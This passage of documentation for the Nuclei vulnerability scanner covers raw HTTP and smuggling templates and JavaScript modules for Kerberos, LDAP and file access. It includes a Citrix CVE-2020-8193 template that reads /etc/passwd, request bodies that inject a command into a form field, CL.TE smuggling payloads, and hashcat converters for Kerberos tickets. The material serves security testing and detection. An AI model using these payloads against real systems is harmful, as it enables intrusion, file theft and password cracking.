        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0

        id=5

    threads: 5
    race: true
```
More complete examples are provided [here](/templates/protocols/http/http-race-condition-examples)
# Raw HTTP Protocol
Learn about using Raw HTTP with Nuclei
Another way to create requests is using raw requests, which come with more flexibility and support for DSL helper functions, like the following ones (as of now it's suggested to leave the `Host` header as in the example, with the variable `{{Hostname}}`). All the matcher and extractor capabilities can be used with raw requests in the same way described above.
```yaml
http:
  - raw:
      - |
        POST /path2/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        a=test&b=pd
```
Requests can be fine-tuned to perform the exact tasks desired. Nuclei requests are fully configurable, meaning you can define every aspect of the requests that will be sent to the target servers.
The raw request format also supports [various helper functions](/templates/reference/helper-functions/), letting us do run-time manipulation of the input. An example of using a helper function in a header:
```yaml
- raw:
    - |
      GET /manager/html HTTP/1.1
      Host: {{Hostname}}
      Authorization: Basic {{base64('username:password')}} # Helper function to encode input at run time.
```
To make a request to the URL specified as input without any additional tampering, a blank Request URI can be used as shown below, which will make the request to the user-specified input.
```yaml
- raw:
    - |
      GET HTTP/1.1
      Host: {{Hostname}}
```
More complete examples are provided [here](/templates/protocols/http/raw-http-examples)
# Request Tampering
Learn about request tampering in HTTP with Nuclei
## Requests Annotation
Request inline annotations allow overriding request properties/behavior on a per-request basis. They are very similar to Python/Java class annotations and must be placed on the request just before the RFC line. Currently, only the following overrides are supported:
* `@Host:` which overrides the real target of the request (usually the host/ip provided as input). It supports syntax with ip/domain, port, and scheme, for example: `domain.tld`, `domain.tld:port`, `http://domain.tld:port`
* `@tls-sni:` which overrides the SNI Name of the TLS request (usually the hostname provided as input). It supports any literals. The special value `request.host` uses the `Host` header and `interactsh-url` uses an interactsh generated URL.
* `@timeout:` which overrides the timeout for the request to a custom duration. It supports durations formatted as string. If no duration is specified, the default Timeout flag value is used.
The following example shows the annotations within a request:
```yaml
- |
  @Host: https://projectdiscovery.io:443
  POST / HTTP/1.1
  Pragma: no-cache
  Host: {{Hostname}}
  Cache-Control: no-cache, no-transform
  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
```
This is particularly useful, for example, in the case of templates with multiple requests, where one request after the initial one needs to be performed to a specific host (for example, to check an API validity):
```yaml
http:
  - raw:
      # this request will be sent to {{Hostname}} to get the token
      - |
        GET /getkey HTTP/1.1
        Host: {{Hostname}}

      # This request will be sent instead to https://api.target.com:443 to verify the token validity
      - |
        @Host: https://api.target.com:443
        GET /api/key={{token}} HTTP/1.1
        Host: api.target.com:443

    extractors:
      - type: regex
        name: token
        part: body
        regex:
          # random extractor of strings between prefix and suffix
          - 'prefix(.*)suffix'

    matchers:
      - type: word
        part: body
        words:
          - valid token
```
Example of a custom `timeout` annotation:
```yaml
- |
  @timeout: 25s
  POST /conf_mail.php HTTP/1.1
  Host: {{Hostname}}
  Content-Type: application/x-www-form-urlencoded

  mail_address=%3B{{cmd}}%3B&button=%83%81%81%5B%83%8B%91%97%90M
```
Example of the `sni` annotation with `interactsh-url`:
```yaml
- |
  @tls-sni: interactsh-url
  POST /conf_mail.php HTTP/1.1
  Host: {{Hostname}}
  Content-Type: application/x-www-form-urlencoded

  mail_address=%3B{{cmd}}%3B&button=%83%81%81%5B%83%8B%91%97%90M
```
## Smuggling
HTTP Smuggling is a class of Web-Attacks recently made popular by [Portswigger’s Research](https://portswigger.net/research/http-desync-attacks-request-smuggling-reborn) into the topic. For an in-depth overview, please visit the article linked above.
In the open source space, detecting HTTP smuggling is difficult, particularly because the requests used for detection are malformed by nature. Nuclei is able to reliably detect HTTP Smuggling vulnerabilities utilising the [rawhttp](https://github.com/projectdiscovery/rawhttp) engine.
The most basic example of an HTTP Smuggling vulnerability is CL.TE Smuggling. An example template to detect a CL.TE HTTP Smuggling vulnerability is provided below using the `unsafe: true` attribute for rawhttp based requests.
```yaml
id: CL-TE-http-smuggling

info:
  name: HTTP request smuggling, basic CL.TE vulnerability
  author: pdteam
  severity: info
  reference: https://portswigger.net/web-security/request-smuggling/lab-basic-cl-te

http:
  - raw:
      - |+
        POST / HTTP/1.1
        Host: {{Hostname}}
        Connection: keep-alive
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 6
        Transfer-Encoding: chunked

        0

        G
      - |+
        POST / HTTP/1.1
        Host: {{Hostname}}
        Connection: keep-alive
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 6
        Transfer-Encoding: chunked

        0

        G

    unsafe: true
    matchers:
      - type: word
        words:
          - 'Unrecognized method GPOST'
```
More complete examples are provided [here](/templates/protocols/http/http-smuggling-examples)
# Unsafe HTTP
Learn about using rawhttp or unsafe HTTP with Nuclei
Nuclei supports [rawhttp](https://github.com/projectdiscovery/rawhttp) for complete request control and customization allowing **any kind of malformed requests** for issues like HTTP request smuggling, Host header injection, CRLF with malformed characters and more.
**rawhttp** library is disabled by default and can be enabled by including `unsafe: true` in the request block.
Here is an example of an HTTP request smuggling detection template using `rawhttp`.
```yaml
http:
  - raw:
      - |+
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 150
        Transfer-Encoding: chunked

        0

        GET /post?postId=5 HTTP/1.1
        User-Agent: a"/>
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 5

        x=1
      - |+
        GET /post?postId=5 HTTP/1.1
        Host: {{Hostname}}

    unsafe: true # Enables rawhttp client
    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "")'
```
# Value Sharing
Learn about sharing values between HTTP requests in the HTTP template.
## HTTP Value Sharing
In Nuclei, it is possible to extract a value from one HTTP request and share/reuse it in another HTTP request. This has various use cases, like logins, CSRF tokens, and other complex multi-step flows.
This concept of value sharing is possible using [Dynamic Extractors](/templates/reference/extractors#dynamic-extractor). Here's a simple example demonstrating value sharing between HTTP requests.
This template makes subsequent HTTP requests while maintaining the session between requests, dynamically extracting data from one response, reusing it in another request via a variable name, and checking for a string match against the response.
```yaml
id: CVE-2020-8193

info:
  name: Citrix unauthenticated LFI
  author: pdteam
  severity: high
  reference: https://github.com/jas502n/CVE-2020-8193

http:
  - raw:
      - |
        POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
        Content-Type: application/xml
        X-NITRO-USER: xpyZxwy6
        X-NITRO-PASS: xWXHUJ56
      - |
        GET /menu/ss?sid=nsroot&username=nsroot&force_setup=1 HTTP/1.1
        Host: {{Hostname}}
        User-Agent: python-requests/2.24.0
        Accept: */*
        Connection: close
      - |
        GET /menu/neo HTTP/1.1
        Host: {{Hostname}}
        User-Agent: python-requests/2.24.0
        Accept: */*
        Connection: close
      - |
        GET /menu/stc HTTP/1.1
        Host: {{Hostname}}
        User-Agent: python-requests/2.24.0
        Accept: */*
        Connection: close
      - |
        POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1
        Host: {{Hostname}}
        User-Agent: python-requests/2.24.0
        Accept: */*
        Connection: close
        Content-Type: application/xml
        X-NITRO-USER: oY39DXzQ
        X-NITRO-PASS: ZuU9Y9c1
        rand_key: §randkey§
      - |
        POST /rapi/filedownload?filter=path:%2Fetc%2Fpasswd HTTP/1.1
        Host: {{Hostname}}
        User-Agent: python-requests/2.24.0
        Accept: */*
        Connection: close
        Content-Type: application/xml
        X-NITRO-USER: oY39DXzQ
        X-NITRO-PASS: ZuU9Y9c1
        rand_key: §randkey§

    cookie-reuse: true # Using cookie-reuse to maintain session between each request, same as browser.

    extractors:
      - type: regex
        name: randkey # Variable name
        part: body
        internal: true
        regex:
          - "(?m)[0-9]{3,10}\\.[0-9]+"

    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0:"
        part: body
```
# JavaScript Protocol Introduction
Learn more about using JavaScript with Nuclei v3
## Introduction
Nuclei and the ProjectDiscovery community thrive on the ability to write exploits/checks in a fast and simple YAML format. We work consistently to improve our **Nuclei templates** to encourage those as the standard for writing security checks. We understand the limitations and are always working to address those, while we work on expanding our capabilities.
Nuclei currently supports writing templates for complex HTTP, DNS, SSL protocol exploits/checks through a powerful and easy to use DSL in the Nuclei engine. However, we understand the current support may not be enough for addressing vulnerabilities across all protocols and in non-remote domains of security like local privilege escalation checks, kernel etc.
To address this, Nuclei v3 includes an embedded runtime for JavaScript that is tailored for **Nuclei** with the help of **[Goja](https://github.com/dop251/goja)**.
## Features
**Support for provider or driver-specific exploits**
Some vulnerabilities are specific to software or a driver. For example, a Redis buffer overflow exploit, an exploit of specific VPN software, or exploits that are not part of the Internet Engineering Task Force (IETF) standard protocols.
Since these are not standard protocols they are not typically added to Nuclei. Detection for these types of exploits cannot be written using a 'network' protocol.
They are often very complex to write and detection for these exploits can be written by exposing the required library in Nuclei (if not already present). We now provide support for writing detection of these types of exploits with JavaScript.
**Non-network checks**
Security is not limited to network exploits. Nuclei provides support for security beyond network issues like:
* Local privilege escalation checks
* Kernel exploits
* Account misconfigurations
* System misconfigurations
**Complex network protocol exploits**
Some network exploits are very complex to write due to the nature of the protocol or exploit itself. For example, [CVE-2020-0796](https://nvd.nist.gov/vuln/detail/cve-2020-0796) requires you to manually construct a packet.
Detection for these exploits is usually written in Python but now can be written in JavaScript.
**Multi-step exploits**
LDAP or Kerberos exploits usually involve a multi-step process of authentication and are difficult to write in YAML-based DSL. JavaScript support makes this easier.
**Scalable and maintainable exploits**
One-off exploit detections written in code are not scalable or maintainable, due to the nature of the language, boilerplate code, and other factors. Our goal is to provide the tools that allow you to write the **minimum** code required to run detection of the exploit and let Nuclei do the rest.
**Leveraging Turing complete language**
While YAML-based DSL is powerful and easy to use, it is not Turing complete and has its own limitations. JavaScript is Turing complete, thus users who are already familiar with JavaScript can write network and other exploit detections without learning a new DSL or hacking around the existing one.
## Requirements
* A basic knowledge of JavaScript (loops, functions, arrays) is required to write a JavaScript protocol template
* Nuclei v3.0.0 or above
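As a rough sketch of what a JavaScript protocol template looks like (assuming a `javascript` block with `code` and `args` fields; the `net` module used here is documented later in this reference, and the template id is hypothetical):
```yaml
id: js-protocol-example

info:
  name: JavaScript protocol example
  author: pdteam
  severity: info

javascript:
  - code: |
      const net = require('nuclei/net');
      const conn = net.Open('tcp', Host + ':' + Port);
      // ... interact with the connection and emit data for matching ...
    args:
      Host: "{{Host}}"
      Port: "80"
```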
# Namespace: bytes
## Table of contents
### Classes
* [Buffer](/templates/protocols/javascript/modules/bytes.Buffer)
# Namespace: fs
## Table of contents
### Functions
* [ListDir](/templates/protocols/javascript/modules/fs#listdir)
* [ReadFile](/templates/protocols/javascript/modules/fs#readfile)
* [ReadFileAsString](/templates/protocols/javascript/modules/fs#readfileasstring)
* [ReadFilesFromDir](/templates/protocols/javascript/modules/fs#readfilesfromdir)
## Functions
### ListDir
▸ **ListDir**(`path`, `itemType`): `string`\[] | `null`
ListDir lists itemType values within a directory, depending on the itemType provided.
itemType can be any one of \['file', 'dir', ''].
#### Parameters
| Name | Type |
| :--------- | :------- |
| `path` | `string` |
| `itemType` | `string` |
#### Returns
`string`\[] | `null`
**`Example`**
```javascript
const fs = require('nuclei/fs');
// this will only return files in /tmp directory
const files = fs.ListDir('/tmp', 'file');
```
**`Example`**
```javascript
const fs = require('nuclei/fs');
// this will only return directories in /tmp directory
const dirs = fs.ListDir('/tmp', 'dir');
```
**`Example`**
```javascript
const fs = require('nuclei/fs');
// when no itemType is provided, it will return both files and directories
const items = fs.ListDir('/tmp');
```
#### Defined in
fs.ts:26
***
### ReadFile
▸ **ReadFile**(`path`): `Uint8Array` | `null`
ReadFile reads file contents within permitted paths
and returns content as byte array
#### Parameters
| Name | Type |
| :----- | :------- |
| `path` | `string` |
#### Returns
`Uint8Array` | `null`
**`Example`**
```javascript
const fs = require('nuclei/fs');
// here permitted directories are $HOME/nuclei-templates/*
const content = fs.ReadFile('helpers/usernames.txt');
```
#### Defined in
fs.ts:42
***
### ReadFileAsString
▸ **ReadFileAsString**(`path`): `string` | `null`
ReadFileAsString reads file contents within permitted paths
and returns content as string
#### Parameters
| Name | Type |
| :----- | :------- |
| `path` | `string` |
#### Returns
`string` | `null`
**`Example`**
```javascript
const fs = require('nuclei/fs');
// here permitted directories are $HOME/nuclei-templates/*
const content = fs.ReadFileAsString('helpers/usernames.txt');
```
#### Defined in
fs.ts:58
***
### ReadFilesFromDir
▸ **ReadFilesFromDir**(`dir`): `string`\[] | `null`
ReadFilesFromDir reads all files from a directory
and returns a string array with file contents of all files
#### Parameters
| Name | Type |
| :---- | :------- |
| `dir` | `string` |
#### Returns
`string`\[] | `null`
**`Example`**
```javascript
const fs = require('nuclei/fs');
// here permitted directories are $HOME/nuclei-templates/*
const contents = fs.ReadFilesFromDir('helpers/ssh-keys');
log(contents);
```
#### Defined in
fs.ts:75
# Namespace: ikev2
## Table of contents
### Classes
* [IKEMessage](/templates/protocols/javascript/modules/ikev2.IKEMessage)
### Interfaces
* [IKENonce](/templates/protocols/javascript/modules/ikev2.IKENonce)
* [IKENotification](/templates/protocols/javascript/modules/ikev2.IKENotification)
### Variables
* [IKE\_EXCHANGE\_AUTH](/templates/protocols/javascript/modules/ikev2#ike_exchange_auth)
* [IKE\_EXCHANGE\_CREATE\_CHILD\_SA](/templates/protocols/javascript/modules/ikev2#ike_exchange_create_child_sa)
* [IKE\_EXCHANGE\_INFORMATIONAL](/templates/protocols/javascript/modules/ikev2#ike_exchange_informational)
* [IKE\_EXCHANGE\_SA\_INIT](/templates/protocols/javascript/modules/ikev2#ike_exchange_sa_init)
* [IKE\_FLAGS\_InitiatorBitCheck](/templates/protocols/javascript/modules/ikev2#ike_flags_initiatorbitcheck)
* [IKE\_NOTIFY\_NO\_PROPOSAL\_CHOSEN](/templates/protocols/javascript/modules/ikev2#ike_notify_no_proposal_chosen)
* [IKE\_NOTIFY\_USE\_TRANSPORT\_MODE](/templates/protocols/javascript/modules/ikev2#ike_notify_use_transport_mode)
* [IKE\_VERSION\_2](/templates/protocols/javascript/modules/ikev2#ike_version_2)
## Variables
### IKE\_EXCHANGE\_AUTH
• `Const` **IKE\_EXCHANGE\_AUTH**: `35`
#### Defined in
ikev2.ts:4
***
### IKE\_EXCHANGE\_CREATE\_CHILD\_SA
• `Const` **IKE\_EXCHANGE\_CREATE\_CHILD\_SA**: `36`
#### Defined in
ikev2.ts:7
***
### IKE\_EXCHANGE\_INFORMATIONAL
• `Const` **IKE\_EXCHANGE\_INFORMATIONAL**: `37`
#### Defined in
ikev2.ts:10
***
### IKE\_EXCHANGE\_SA\_INIT
• `Const` **IKE\_EXCHANGE\_SA\_INIT**: `34`
#### Defined in
ikev2.ts:13
***
### IKE\_FLAGS\_InitiatorBitCheck
• `Const` **IKE\_FLAGS\_InitiatorBitCheck**: `8`
#### Defined in
ikev2.ts:16
***
### IKE\_NOTIFY\_NO\_PROPOSAL\_CHOSEN
• `Const` **IKE\_NOTIFY\_NO\_PROPOSAL\_CHOSEN**: `14`
#### Defined in
ikev2.ts:19
***
### IKE\_NOTIFY\_USE\_TRANSPORT\_MODE
• `Const` **IKE\_NOTIFY\_USE\_TRANSPORT\_MODE**: `16391`
#### Defined in
ikev2.ts:22
***
### IKE\_VERSION\_2
• `Const` **IKE\_VERSION\_2**: `32`
#### Defined in
ikev2.ts:25
# Namespace: kerberos
## Table of contents
### Classes
* [Client](/templates/protocols/javascript/modules/kerberos.Client)
* [Config](/templates/protocols/javascript/modules/kerberos.Config)
### Interfaces
* [AuthorizationDataEntry](/templates/protocols/javascript/modules/kerberos.AuthorizationDataEntry)
* [BitString](/templates/protocols/javascript/modules/kerberos.BitString)
* [EncTicketPart](/templates/protocols/javascript/modules/kerberos.EncTicketPart)
* [EncryptedData](/templates/protocols/javascript/modules/kerberos.EncryptedData)
* [EncryptionKey](/templates/protocols/javascript/modules/kerberos.EncryptionKey)
* [EnumerateUserResponse](/templates/protocols/javascript/modules/kerberos.EnumerateUserResponse)
* [HostAddress](/templates/protocols/javascript/modules/kerberos.HostAddress)
* [LibDefaults](/templates/protocols/javascript/modules/kerberos.LibDefaults)
* [PrincipalName](/templates/protocols/javascript/modules/kerberos.PrincipalName)
* [Realm](/templates/protocols/javascript/modules/kerberos.Realm)
* [TGS](/templates/protocols/javascript/modules/kerberos.TGS)
* [Ticket](/templates/protocols/javascript/modules/kerberos.Ticket)
* [TransitedEncoding](/templates/protocols/javascript/modules/kerberos.TransitedEncoding)
### Functions
* [ASRepToHashcat](/templates/protocols/javascript/modules/kerberos#asreptohashcat)
* [CheckKrbError](/templates/protocols/javascript/modules/kerberos#checkkrberror)
* [NewKerberosClientFromString](/templates/protocols/javascript/modules/kerberos#newkerberosclientfromstring)
* [SendToKDC](/templates/protocols/javascript/modules/kerberos#sendtokdc)
* [TGStoHashcat](/templates/protocols/javascript/modules/kerberos#tgstohashcat)
## Functions
### ASRepToHashcat
▸ **ASRepToHashcat**(`asrep`): `string` | `null`
ASRepToHashcat converts an AS-REP message to a hashcat format
#### Parameters
| Name | Type |
| :------ | :---- |
| `asrep` | `any` |
#### Returns
`string` | `null`
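**`Example`**
A hedged sketch; `asrep` stands in for an AS-REP message object obtained from a prior exchange (not shown here).
```javascript
const kerberos = require('nuclei/kerberos');
// asrep: AS-REP object from a prior AS exchange (hypothetical variable)
const hash = kerberos.ASRepToHashcat(asrep);
log(hash);
```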
#### Defined in
kerberos.ts:6
***
### CheckKrbError
▸ **CheckKrbError**(`b`): `Uint8Array` | `null`
CheckKrbError checks if the response bytes from the KDC are a KRBError.
#### Parameters
| Name | Type |
| :--- | :----------- |
| `b` | `Uint8Array` |
#### Returns
`Uint8Array` | `null`
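**`Example`**
A hedged sketch; `respBytes` stands in for raw response bytes returned by a KDC exchange (not shown here).
```javascript
const kerberos = require('nuclei/kerberos');
// respBytes: Uint8Array response from the KDC (hypothetical variable)
const checked = kerberos.CheckKrbError(respBytes);
```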
#### Defined in
kerberos.ts:15
***
### NewKerberosClientFromString
▸ **NewKerberosClientFromString**(`cfg`): [`Client`](/templates/protocols/javascript/modules/kerberos.Client) | `null`
NewKerberosClientFromString creates a new kerberos client from a string
by parsing krb5.conf
#### Parameters
| Name | Type |
| :---- | :------- |
| `cfg` | `string` |
#### Returns
[`Client`](/templates/protocols/javascript/modules/kerberos.Client) | `null`
**`Example`**
```javascript
const kerberos = require('nuclei/kerberos');
const client = kerberos.NewKerberosClientFromString(`
[libdefaults]
default_realm = ACME.COM
dns_lookup_kdc = true
`);
```
#### Defined in
kerberos.ts:34
***
### SendToKDC
▸ **SendToKDC**(`kclient`, `msg`): `string` | `null`
SendToKDC sends a message to the KDC and returns the response.
It first tries to send the message over TCP; if that fails, it falls back to UDP (and vice versa).
#### Parameters
| Name | Type |
| :-------- | :------------------------------------------------------------------ |
| `kclient` | [`Client`](/templates/protocols/javascript/modules/kerberos.Client) |
| `msg` | `string` |
#### Returns
`string` | `null`
**`Example`**
```javascript
const kerberos = require('nuclei/kerberos');
const client = new kerberos.Client('acme.com');
const response = kerberos.SendToKDC(client, 'message');
```
#### Defined in
kerberos.ts:51
***
### TGStoHashcat
▸ **TGStoHashcat**(`tgs`, `username`): `string` | `null`
TGStoHashcat converts a TGS to a hashcat format.
#### Parameters
| Name | Type |
| :--------- | :------- |
| `tgs` | `any` |
| `username` | `string` |
#### Returns
`string` | `null`
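**`Example`**
A hedged sketch; `tgs` stands in for a TGS object obtained from a prior exchange (not shown here).
```javascript
const kerberos = require('nuclei/kerberos');
// tgs: ticket object from a prior TGS exchange (hypothetical variable)
const hash = kerberos.TGStoHashcat(tgs, 'administrator');
log(hash);
```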
#### Defined in
kerberos.ts:60
# Namespace: ldap
## Table of contents
### Classes
* [Client](/templates/protocols/javascript/modules/ldap.Client)
### Interfaces
* [Config](/templates/protocols/javascript/modules/ldap.Config)
* [LdapAttributes](/templates/protocols/javascript/modules/ldap.LdapAttributes)
* [LdapEntry](/templates/protocols/javascript/modules/ldap.LdapEntry)
* [Metadata](/templates/protocols/javascript/modules/ldap.Metadata)
* [SearchResult](/templates/protocols/javascript/modules/ldap.SearchResult)
### Variables
* [FilterAccountDisabled](/templates/protocols/javascript/modules/ldap#filteraccountdisabled)
* [FilterAccountEnabled](/templates/protocols/javascript/modules/ldap#filteraccountenabled)
* [FilterCanSendEncryptedPassword](/templates/protocols/javascript/modules/ldap#filtercansendencryptedpassword)
* [FilterDontExpirePassword](/templates/protocols/javascript/modules/ldap#filterdontexpirepassword)
* [FilterDontRequirePreauth](/templates/protocols/javascript/modules/ldap#filterdontrequirepreauth)
* [FilterHasServicePrincipalName](/templates/protocols/javascript/modules/ldap#filterhasserviceprincipalname)
* [FilterHomedirRequired](/templates/protocols/javascript/modules/ldap#filterhomedirrequired)
* [FilterInterdomainTrustAccount](/templates/protocols/javascript/modules/ldap#filterinterdomaintrustaccount)
* [FilterIsAdmin](/templates/protocols/javascript/modules/ldap#filterisadmin)
* [FilterIsComputer](/templates/protocols/javascript/modules/ldap#filteriscomputer)
* [FilterIsDuplicateAccount](/templates/protocols/javascript/modules/ldap#filterisduplicateaccount)
* [FilterIsGroup](/templates/protocols/javascript/modules/ldap#filterisgroup)
* [FilterIsNormalAccount](/templates/protocols/javascript/modules/ldap#filterisnormalaccount)
* [FilterIsPerson](/templates/protocols/javascript/modules/ldap#filterisperson)
* [FilterLockout](/templates/protocols/javascript/modules/ldap#filterlockout)
* [FilterLogonScript](/templates/protocols/javascript/modules/ldap#filterlogonscript)
* [FilterMnsLogonAccount](/templates/protocols/javascript/modules/ldap#filtermnslogonaccount)
* [FilterNotDelegated](/templates/protocols/javascript/modules/ldap#filternotdelegated)
* [FilterPartialSecretsAccount](/templates/protocols/javascript/modules/ldap#filterpartialsecretsaccount)
* [FilterPasswordCantChange](/templates/protocols/javascript/modules/ldap#filterpasswordcantchange)
* [FilterPasswordExpired](/templates/protocols/javascript/modules/ldap#filterpasswordexpired)
* [FilterPasswordNotRequired](/templates/protocols/javascript/modules/ldap#filterpasswordnotrequired)
* [FilterServerTrustAccount](/templates/protocols/javascript/modules/ldap#filterservertrustaccount)
* [FilterSmartCardRequired](/templates/protocols/javascript/modules/ldap#filtersmartcardrequired)
* [FilterTrustedForDelegation](/templates/protocols/javascript/modules/ldap#filtertrustedfordelegation)
* [FilterTrustedToAuthForDelegation](/templates/protocols/javascript/modules/ldap#filtertrustedtoauthfordelegation)
* [FilterUseDesKeyOnly](/templates/protocols/javascript/modules/ldap#filterusedeskeyonly)
* [FilterWorkstationTrustAccount](/templates/protocols/javascript/modules/ldap#filterworkstationtrustaccount)
### Functions
* [DecodeADTimestamp](/templates/protocols/javascript/modules/ldap#decodeadtimestamp)
* [DecodeSID](/templates/protocols/javascript/modules/ldap#decodesid)
* [DecodeZuluTimestamp](/templates/protocols/javascript/modules/ldap#decodezulutimestamp)
* [JoinFilters](/templates/protocols/javascript/modules/ldap#joinfilters)
* [NegativeFilter](/templates/protocols/javascript/modules/ldap#negativefilter)
## Variables
### FilterAccountDisabled
• `Const` **FilterAccountDisabled**: `"(userAccountControl:1.2.840.113556.1.4.803:=2)"`
The user account is disabled.
#### Defined in
ldap.ts:4
***
### FilterAccountEnabled
• `Const` **FilterAccountEnabled**: `"(!(userAccountControl:1.2.840.113556.1.4.803:=2))"`
The user account is enabled.
#### Defined in
ldap.ts:7
***
### FilterCanSendEncryptedPassword
• `Const` **FilterCanSendEncryptedPassword**: `"(userAccountControl:1.2.840.113556.1.4.803:=128)"`
The user can send an encrypted password.
#### Defined in
ldap.ts:10
***
### FilterDontExpirePassword
• `Const` **FilterDontExpirePassword**: `"(userAccountControl:1.2.840.113556.1.4.803:=65536)"`
Represents the password, which should never expire on the account.
#### Defined in
ldap.ts:13
***
### FilterDontRequirePreauth
• `Const` **FilterDontRequirePreauth**: `"(userAccountControl:1.2.840.113556.1.4.803:=4194304)"`
This account doesn't require Kerberos pre-authentication for logging on.
#### Defined in
ldap.ts:16
***
### FilterHasServicePrincipalName
• `Const` **FilterHasServicePrincipalName**: `"(servicePrincipalName=*)"`
The object has a service principal name.
#### Defined in
ldap.ts:19
***
### FilterHomedirRequired
• `Const` **FilterHomedirRequired**: `"(userAccountControl:1.2.840.113556.1.4.803:=8)"`
The home folder is required.
#### Defined in
ldap.ts:22
***
### FilterInterdomainTrustAccount
• `Const` **FilterInterdomainTrustAccount**: `"(userAccountControl:1.2.840.113556.1.4.803:=2048)"`
It's a permit to trust an account for a system domain that trusts other domains.
#### Defined in
ldap.ts:25
***
### FilterIsAdmin
• `Const` **FilterIsAdmin**: `"(adminCount=1)"`
The object is an admin.
#### Defined in
ldap.ts:28
***
### FilterIsComputer
• `Const` **FilterIsComputer**: `"(objectCategory=computer)"`
The object is a computer.
#### Defined in
ldap.ts:31
***
### FilterIsDuplicateAccount
• `Const` **FilterIsDuplicateAccount**: `"(userAccountControl:1.2.840.113556.1.4.803:=256)"`
It's an account for users whose primary account is in another domain.
#### Defined in
ldap.ts:34
***
### FilterIsGroup
• `Const` **FilterIsGroup**: `"(objectCategory=group)"`
The object is a group.
#### Defined in
ldap.ts:37
***
### FilterIsNormalAccount
• `Const` **FilterIsNormalAccount**: `"(userAccountControl:1.2.840.113556.1.4.803:=512)"`
It's a default account type that represents a typical user.
#### Defined in
ldap.ts:40
***
### FilterIsPerson
• `Const` **FilterIsPerson**: `"(objectCategory=person)"`
The object is a person.
#### Defined in
ldap.ts:43
***
### FilterLockout
• `Const` **FilterLockout**: `"(userAccountControl:1.2.840.113556.1.4.803:=16)"`
The user is locked out.
#### Defined in
ldap.ts:46
***
### FilterLogonScript
• `Const` **FilterLogonScript**: `"(userAccountControl:1.2.840.113556.1.4.803:=1)"`
The logon script will be run.
#### Defined in
ldap.ts:49
***
### FilterMnsLogonAccount
• `Const` **FilterMnsLogonAccount**: `"(userAccountControl:1.2.840.113556.1.4.803:=131072)"`
It's an MNS logon account.
#### Defined in
ldap.ts:52
***
### FilterNotDelegated
• `Const` **FilterNotDelegated**: `"(userAccountControl:1.2.840.113556.1.4.803:=1048576)"`
When this flag is set, the security context of the user isn't delegated to a service even if the service account is set as trusted for Kerberos delegation.
#### Defined in
ldap.ts:55
***
### FilterPartialSecretsAccount
• `Const` **FilterPartialSecretsAccount**: `"(userAccountControl:1.2.840.113556.1.4.803:=67108864)"`
The account is a read-only domain controller (RODC).
#### Defined in
ldap.ts:58
***
### FilterPasswordCantChange
• `Const` **FilterPasswordCantChange**: `"(userAccountControl:1.2.840.113556.1.4.803:=64)"`
The user can't change the password.
#### Defined in
ldap.ts:61
***
### FilterPasswordExpired
• `Const` **FilterPasswordExpired**: `"(userAccountControl:1.2.840.113556.1.4.803:=8388608)"`
The user's password has expired.
#### Defined in
ldap.ts:64
***
### FilterPasswordNotRequired
• `Const` **FilterPasswordNotRequired**: `"(userAccountControl:1.2.840.113556.1.4.803:=32)"`
No password is required.
#### Defined in
ldap.ts:67
***
### FilterServerTrustAccount
• `Const` **FilterServerTrustAccount**: `"(userAccountControl:1.2.840.113556.1.4.803:=8192)"`
It's a computer account for a domain controller that is a member of this domain.
#### Defined in
ldap.ts:70
***
### FilterSmartCardRequired
• `Const` **FilterSmartCardRequired**: `"(userAccountControl:1.2.840.113556.1.4.803:=262144)"`
When this flag is set, it forces the user to log on by using a smart card.
#### Defined in
ldap.ts:73
***
### FilterTrustedForDelegation
• `Const` **FilterTrustedForDelegation**: `"(userAccountControl:1.2.840.113556.1.4.803:=524288)"`
When this flag is set, the service account (the user or computer account) under which a service runs is trusted for Kerberos delegation.
#### Defined in
ldap.ts:76
***
### FilterTrustedToAuthForDelegation
• `Const` **FilterTrustedToAuthForDelegation**: `"(userAccountControl:1.2.840.113556.1.4.803:=16777216)"`
The account is enabled for delegation.
#### Defined in
ldap.ts:79
***
### FilterUseDesKeyOnly
• `Const` **FilterUseDesKeyOnly**: `"(userAccountControl:1.2.840.113556.1.4.803:=2097152)"`
Restrict this principal to use only Data Encryption Standard (DES) encryption types for keys.
#### Defined in
ldap.ts:82
***
### FilterWorkstationTrustAccount
• `Const` **FilterWorkstationTrustAccount**: `"(userAccountControl:1.2.840.113556.1.4.803:=4096)"`
It's a computer account for a computer that is running old Windows builds.
#### Defined in
ldap.ts:85
## Functions
### DecodeADTimestamp
▸ **DecodeADTimestamp**(`timestamp`): `string`
DecodeADTimestamp decodes an Active Directory timestamp
#### Parameters
| Name | Type |
| :---------- | :------- |
| `timestamp` | `string` |
#### Returns
`string`
**`Example`**
```javascript
const ldap = require('nuclei/ldap');
const timestamp = ldap.DecodeADTimestamp('132036744000000000');
log(timestamp);
```
#### Defined in
ldap.ts:96
***
### DecodeSID
▸ **DecodeSID**(`s`): `string`
DecodeSID decodes a SID string
#### Parameters
| Name | Type |
| :--- | :------- |
| `s` | `string` |
#### Returns
`string`
**`Example`**
```javascript
const ldap = require('nuclei/ldap');
const sid = ldap.DecodeSID('S-1-5-21-3623811015-3361044348-30300820-1013');
log(sid);
```
#### Defined in
ldap.ts:111
***
### DecodeZuluTimestamp
▸ **DecodeZuluTimestamp**(`timestamp`): `string`
DecodeZuluTimestamp decodes a Zulu timestamp
#### Parameters
| Name | Type |
| :---------- | :------- |
| `timestamp` | `string` |
#### Returns
`string`
**`Example`**
```javascript
const ldap = require('nuclei/ldap');
const timestamp = ldap.DecodeZuluTimestamp('2021-08-25T10:00:00Z');
log(timestamp);
```
#### Defined in
ldap.ts:126
***
### JoinFilters
▸ **JoinFilters**(`filters`): `string`
JoinFilters joins multiple filters into a single filter
#### Parameters
| Name | Type |
